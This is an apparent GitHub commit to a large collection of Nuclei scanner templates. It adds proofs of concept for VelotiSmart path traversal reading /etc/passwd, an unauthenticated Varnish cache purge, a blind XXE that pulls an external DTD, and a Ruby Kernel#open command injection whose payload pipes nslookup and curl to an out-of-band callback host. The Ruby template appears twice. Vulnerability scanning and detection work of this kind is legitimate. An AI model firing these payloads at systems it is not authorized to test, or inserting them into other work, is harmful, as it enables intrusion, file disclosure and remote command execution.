20241117

adysec · Nov 17, 2024 · 592aced · 592aced
1 parent cf40c46
commit 592aced
Show file tree

Hide file tree

Showing 7 changed files with 163 additions and 1 deletion.
diff --git a/date.txt b/date.txt
@@ -1 +1 @@
-20241116
+20241117
diff --git a/poc.txt b/poc.txt
@@ -13572,6 +13572,7 @@
 ./poc/cve/CVE-2018-9864-81cacf864a5dfb4950190c661185ab22.yaml
 ./poc/cve/CVE-2018-9864.yaml
 ./poc/cve/CVE-2018-9995.yaml
+./poc/cve/CVE-2018–14064(1).yaml
 ./poc/cve/CVE-2018–14064.yaml
 ./poc/cve/CVE-2019-0193.yaml
 ./poc/cve/CVE-2019-0211.yaml
@@ -109608,6 +109609,7 @@
 ./poc/other/unakit.yaml
 ./poc/other/unaunthenticated-jenkin-10883.yaml
 ./poc/other/unaunthenticated-jenkin.yaml
+./poc/other/unautneicated-cache-purge.yaml
 ./poc/other/uncanny-automator-1df18b3ce0870f9a096bc4c892d90dcd.yaml
 ./poc/other/uncanny-automator-a74118e3ab0c456b6e3136d8fe18f6d4.yaml
 ./poc/other/uncanny-automator-d41d8cd98f00b204e9800998ecf8427e.yaml
@@ -114580,6 +114582,7 @@
 ./poc/remote_code_execution/clockwatch-enterprise-rce-1010.yaml
 ./poc/remote_code_execution/clockwatch-enterprise-rce-1011.yaml
 ./poc/remote_code_execution/clockwatch-enterprise-rce.yaml
+./poc/remote_code_execution/cmdi-ruby-open-rce.yaml
 ./poc/remote_code_execution/co2ok-for-woocommerce-111032b9706968c14c7d64c4f7dfc20e.yaml
 ./poc/remote_code_execution/co2ok-for-woocommerce-5a72e600d911398f0a295fcf76a6c0a4.yaml
 ./poc/remote_code_execution/co2ok-for-woocommerce-6477bf18cad6c823db485408d49b337b.yaml
@@ -117776,6 +117779,7 @@
 ./poc/remote_code_execution/zzzcms-parser-search-rce.yaml
 ./poc/ruby/alltrails.yaml
 ./poc/ruby/api-securitytrails.yaml
+./poc/ruby/cmdi-ruby-open-rce.yaml
 ./poc/ruby/grails-database-admin-console-1.yaml
 ./poc/ruby/grails-database-admin-console-2.yaml
 ./poc/ruby/grails-database-admin-console-7819.yaml
@@ -139412,6 +139416,7 @@
 ./poc/wordpress/yotuwp-easy-youtube-embed-plugin.yaml
 ./poc/wordpress/yotuwp-easy-youtube-embed.yaml
 ./poc/wordpress/youyou_FE-SQLI-showphoto.yaml
+./poc/xml_external_entity/Blind-XXE.yaml
 ./poc/xml_external_entity/PeopleSoft-XXE-1.yaml
 ./poc/xml_external_entity/PeopleSoft-XXE-2.yaml
 ./poc/xml_external_entity/XXE.yaml

diff --git a/poc/cve/CVE-2018–14064(1).yaml b/poc/cve/CVE-2018–14064(1).yaml
@@ -0,0 +1,21 @@
+id: cve-2018-14064
+info:
+  name: VelotiSmart Wifi - Directory Traversal
+  author: 0x_Akoko
+  severity: high
+  reference: |
+    - https://medium.com/@s1kr10s/velotismart-0day-ca5056bcdcac
+    - https://www.exploit-db.com/exploits/45030
+  tags: velotismart,lfi
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/../../etc/passwd"
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+      - type: status
+        status:
+          - 200
diff --git a/poc/other/unautneicated-cache-purge.yaml b/poc/other/unautneicated-cache-purge.yaml
@@ -0,0 +1,24 @@
+id: unauthenticated-cache-purge
+info:
+  name: Varnish Unauthenticated Cache Purge
+  author: 0xelkomy
+  severity: low
+  description: As per guideline one should protect purges with ACLs from unauthorized hosts.
+  reference: https://book.varnish-software.com/4.0/chapters/Cache_Invalidation.html
+  hackerone: https://hackerone.com/reports/154278
+  tags: varnish,misconfig,cache
+requests:
+  - method: PURGE
+    path:
+      - "{{BaseURL}}"
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>200 Purged</title>'
+          - '"status": "ok"'
+        condition: or
+      - type: status
+        status:
+          - 200
diff --git a/poc/remote_code_execution/cmdi-ruby-open-rce.yaml b/poc/remote_code_execution/cmdi-ruby-open-rce.yaml
@@ -0,0 +1,38 @@
+id: cmdi-ruby-open-rce
+
+info:
+  name: Ruby Kernel#open/URI.open RCE
+  author: pdteam
+  severity: high
+  description: |
+   Ruby's Kernel#open and URI.open enables not only file access but also process invocation by prefixing a pipe symbol (e.g., open(“| ls”)). So, it may lead to Remote Code Execution by using variable input to the argument of Kernel#open and URI.open.
+  reference:
+    - https://bishopfox.com/blog/ruby-vulnerabilities-exploits
+    - https://codeql.github.com/codeql-query-help/ruby/rb-kernel-open/
+  tags: cmdi,oast,dast,blind,ruby,rce
+
+variables:
+  marker: "{{interactsh-url}}"
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    stop-at-first-match: true
+    payloads:
+      interaction:
+        - "|nslookup {{marker}}|curl {{marker}}"
+
+    fuzzing:
+      - part: query
+        fuzz:
+          - "{{interaction}}"
+
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"
+# digest: 490a0046304402206aa8aaaae832c775eb192a6fa98138271fa21bc2ac34b3881f0e06d24fb48f78022040513ba5b73cbfb5fe42c3a312ae9d8e76fb0d6f942ad7bcfe8dfff4f173d00c:922c64590222798bb761d5b6d8e72950
diff --git a/poc/ruby/cmdi-ruby-open-rce.yaml b/poc/ruby/cmdi-ruby-open-rce.yaml
@@ -0,0 +1,38 @@
+id: cmdi-ruby-open-rce
+
+info:
+  name: Ruby Kernel#open/URI.open RCE
+  author: pdteam
+  severity: high
+  description: |
+   Ruby's Kernel#open and URI.open enables not only file access but also process invocation by prefixing a pipe symbol (e.g., open(“| ls”)). So, it may lead to Remote Code Execution by using variable input to the argument of Kernel#open and URI.open.
+  reference:
+    - https://bishopfox.com/blog/ruby-vulnerabilities-exploits
+    - https://codeql.github.com/codeql-query-help/ruby/rb-kernel-open/
+  tags: cmdi,oast,dast,blind,ruby,rce
+
+variables:
+  marker: "{{interactsh-url}}"
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    stop-at-first-match: true
+    payloads:
+      interaction:
+        - "|nslookup {{marker}}|curl {{marker}}"
+
+    fuzzing:
+      - part: query
+        fuzz:
+          - "{{interaction}}"
+
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"
+# digest: 490a0046304402206aa8aaaae832c775eb192a6fa98138271fa21bc2ac34b3881f0e06d24fb48f78022040513ba5b73cbfb5fe42c3a312ae9d8e76fb0d6f942ad7bcfe8dfff4f173d00c:922c64590222798bb761d5b6d8e72950
diff --git a/poc/xml_external_entity/Blind-XXE.yaml b/poc/xml_external_entity/Blind-XXE.yaml
@@ -0,0 +1,36 @@
+id: blind-xxe
+
+info:
+  name: Blind XXE
+  author: geeknik,otterly
+  severity: high
+
+variables:
+  rletter: "{{rand_base(6,'oterly')}}"
+
+requests:
+  - raw:
+      - |
+        POST {{Path}} HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (X11; Linux x88_64; rv:68.0) Gecko/20100101 Firefox/68.0
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+        Accept-Language: en-US,en;q=0.5
+        Accept-Encoding: gzip,deflate
+        Referer: {{BaseURL}}
+        Content-Type: text/xml
+        Content-Length: 112
+        Connection: close
+
+        <?xml version="1.0"?>
+        <!DOCTYPE {{rletter}} SYSTEM "http://{{interactsh-url}}">
+        <{{rletter}}>&e1;</{{rletter}}>
+
+    redirects: true
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"
+          - "http"
+        condition: or